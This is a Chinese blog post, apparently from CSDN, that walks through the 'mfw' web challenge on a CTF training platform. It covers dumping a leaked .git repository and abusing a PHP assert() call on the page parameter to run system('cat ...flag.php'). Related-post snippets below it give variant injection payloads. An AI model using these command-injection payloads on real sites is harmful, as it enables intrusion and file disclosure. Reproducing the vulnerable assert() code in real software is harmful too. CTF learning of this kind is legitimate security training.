攻防世界WEB进阶之mfw

最新推荐文章于 2024-05-26 12:46:39 发布
最新推荐文章于 2024-05-26 12:46:39 发布
阅读量552 收藏
点赞数 1
分类专栏: 攻防世界 文章标签: 攻防世界 web mfw 安全 进阶
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/harry_c/article/details/97622830
版权

攻防世界WEB进阶之mfw

难度系数: 1星
题目来源: csaw-ctf-2016-quals
题目描述:暂无

第一步:分析

题目没有介绍,打开之后看到网页,点击about页面看到如下:
在这里插入图片描述
试着看是否能打开git代码库:
在这里插入图片描述
成功打开说明存在代码泄露问题。

第二步:实操

使用https://github.com/lijiejie/GitHack工具进行:
Python2 GitHack.py http://111.198.29.45:59766
在这里插入图片描述
在这里插入图片描述

看见flag,心中窃喜,难度这么简单,打开一看并没有,打开index.php发现关键代码:

  1. 《!–<li <? php if ($page == "flag") { ?>class=“active”<?php } ?>>My secrets
  2. -->
  3. <?php if (isset($_GET['page'])) { $page = $_GET['page']; } else { $page = "home"; } $file = "templates/" . $page . ".php"; // I heard '..' is dangerous! assert("strpos('$file', '..') === false") or die("Detected hacking attempt!"); // TODO: Make this look nice assert("file_exists('$file')") or die("That file doesn't exist!"); ?>

根据1、2可以断定答案与我们的访问页传输参数有关了。
使用拼装,将flag文件显示出来:使用的语句为’ .system(“cat ./templates/flag.php”).’
即为http://111.198.29.45:59766/?page=%27%20.system(%22cat%20./templates/flag.php%22).%27

第三步:答案

查看源码出现flag:
在这里插入图片描述
至此flag为:cyberpeace{fb1205d3d65e51c9145e5d5230e1e167}

Just_Do_Yite
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
【网络安全 | CSAW】攻防世界mfw解题详析(Git泄露+命令执行)
等风来
05-29 4236
Git是一个非常流行的开源分布式版本控制系统,它被广泛用于协同开发和代码管理。许多网站和应用程序都使用Git作为其代码管理系统,并将其部署到生产环境中以维护其代码库。通过枚举工具或搜索引擎来查找带有.git文件夹的存储库,以获取包含未加密密码、凭据和敏感信息的站点代码库。由于该代码仅对目录遍历进行防范,因此可构造POC,执行系统命令。文件夹被直接部署到线上环境中,这可能会导致Git泄露问题。下载站点存储库的整个代码历史记录和配置信息。然而,在配置不当的情况下,可能会导致。由于下载得到的文件中,
攻防世界web进阶mfw
gongjingege的博客
07-27 388
打开链接 看源代码 以为在?page=flag里,啥也没 到处点点,在about页面里发现了.git 泄露 于是在url后.git/ 或者dirsearch扫一下 然后GitHack下载源码 flag.php里没有,但是index.php里有要求,可以构造payload 代码审计,参考大佬的wp,payload:?page=abc’) or system(“cat templates/flag.php”);// 查看源代码,得到flag 知识点:工具:dirsearch-master,GitHa
攻防世界-mfw
最新发布
weixin_64659753的博客
05-26 307
攻防世界-mfw
攻防世界web进阶mfw详解
hxhxhxhxx的博客
07-31 532
攻防世界web进阶mfw详解题目解法方法二assertstrposfile_exists() 题目 解法 当我们看到about的时候,看到使用了git 我们猜测有git源码泄露 http://220.249.52.133:57869/.git/ githack下载发现flag.php <?php // TODO // $FLAG = ''; ?> 并没有发现什么 那么我们对index.php进行审计看看能发现什么 <?php if (isset($_GET['page'])
攻防世界web进阶区之mfw
qq_45756971的博客
07-25 186
打开题目所给链接:首先查看源码,会发现这个但访问之后没什么用。我们点开About 会发现它似乎存在git源码泄露,访问/.git/抓包后发现flag.php但对解题没什么作用,我们查看index.php看是否能找到猫腻我们利用assert命令执行来查看flag的内容 payload:?page=1’,‘2’) === false and system(‘cat templates/flag.php’) and strpos('templates/flag ,查看源码即可得到flag cyberpeace{
攻防世界 Web高手进阶mfw
feng的博客
09-05 524
这是涉及git泄露,PHP危险函数中的assert()函数,以及代码审计的一个题目。
攻防世界_web进阶篇_mfw
Sk1y的博客
11-12 594
一个git源码泄露题目 文章目录git源码泄露源码分析构造payload git源码泄露 打开容器,页面如下 点击About,提示git源码泄露 在url后面加上了/.git/,证明了这一点 然后使用工具进行git源码下载,工具:https://github.com/BugScanTeam/GitHack 在python2的环境下进行源码下载 python GitHack.py http://111.200.241.244:59908/.git/ 最后在./dist文件夹下得到源码index.ph
攻防世界 web进阶笔记
weixin_43928140的博客
06-03 1836
0x02 NaNNaNNaNNaN-Batman 首先下载附件得到web100,用notepad++打开看下,是一些js乱码 我把源码贴到下面 <script>_='function $(){e=getEleById("c").value;length==16^be0f23233ace98aa$c7be9){tfls_aie}na_h0lnrg...
xctf攻防世界 Web高手进阶mfw
l8947943的博客
08-11 7536
题目给出的内容如图:一通点击后,发现链接中出现page=***的字样,说明page传参是重点,是问题的突破口。
攻防世界web高手进阶区(二)
weixin_44866139的博客
03-17 550
supersqli 题目提示随便住,输入1’题目报错说多了一个分号,存在sql注入 输入1’#,返回正确 1’ order by 2# 1’ order by 3#,返回错误,说明有两列 联合查询,发现select字段被过滤了 当关键字被过滤时可以尝试堆叠注入 方法一:堆叠注入 -1’;show tables#,–+好像被过滤了 1、查看字段 -1’;show columns from 1919...
mfw-bootstrap
04-02
"mfw-bootstrap"是一个基于HTML的引导样板项目,它的核心目标是为开发者提供一个快速启动Web页面设计和开发的基础框架。Bootstrap是由Twitter开发并开源的一个流行的前端开发框架,它简化了网页布局、响应式设计以及...
调度组织_MFW.pptx
10-08
《调度组织在工业企业管理中的核心作用》 调度管理在工业企业的运营中扮演着至关重要的角色,它是企业高效运行的“指挥中心”、“信息中心”和“协调中心”。调度管理不仅涉及到对企业活动的指挥与运筹,而且在信息...
peach-pit-mfwMFW第一天示例
02-25
在IT行业中,HTML(HyperText Markup Language)是一种用于创建网页的标准标记语言,是构建互联网的基础之一。"peach-pit-mfw"似乎是一个项目或教程的名称,它以"MFW第一天示例"为主题,意在引导用户了解或学习某个...
Gjhnsn.github.io:MFW投资组合
03-30
2. **个人投资组合**: MFW投资组合可能代表一个特定的投资模型或策略,用户可以在此展示他们的投资选择、历史回报和风险管理策略。这样的网站通常包括投资组合概述、资产配置、市场分析和投资目标等内容。 3. **...
角度转换、坐标转换.zip_MFW_T4V_angle转换_坐标转换_弧度 坐标正反算
07-14
角度转弧度,弧度转角度, 坐标的正算,坐标的反算
攻防世界WEB进阶之upload1
热门推荐
harry_c的博客
10-03 1万+
攻防世界WEB进阶之upload1一、分析二、实操三、答案 难度系数: 1星 题目来源: 暂无 题目描述:暂无 题目场景: 略 题目附件: 暂无 一、分析 首先打开场景,上传文件进行抓包操作,发现存在部分js代码。 function check(){ upfile = document.getElementById("upfile"); submit = document.getElement...
攻防世界WEB进阶之Cat
harry_c的博客
08-05 8499
攻防世界WEB进阶之Cat第一步:分析第二步:实操第三步:答案 第一步:分析 难度系数: 2星 题目来源: XCTF 4th-WHCTF-2017 题目描述:抓住那只猫 首先题给出的信息抓住那只猫,没任何提示性,题目来源为XCTF,点击场景,打开为一个输入页面: 提示输入域名,测试题给的域名loli.club,无任何响应,但是查询的内容出现在搜索框中为get请求,再测试127.0.0.1,巧了,返...
攻防世界WEB进阶之bug
harry_c的博客
09-08 6341
攻防世界WEB进阶之bug1、描述2、实操3、答案 1、描述 难度系数: 2星 题目来源: RCTF-2015 题目描述:暂无 题目场景: 点击获取在线场景 题目附件: 暂无 首先打开场景发现是一个登录页面,而且有注册界面,而且还有修改密码的选项,首先注册号账号后查看是否登陆进去能找到漏洞,未果。 打开修改密码界面,尝试是否有逻辑漏洞,果然,将admin账号的密码成功修改为harry。 2、实操 ...
度为2的有序树就是二叉树
09-01
- *3* [第六章 树和二叉树习题1](https://download.csdn.net/download/MFW333/87596042)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值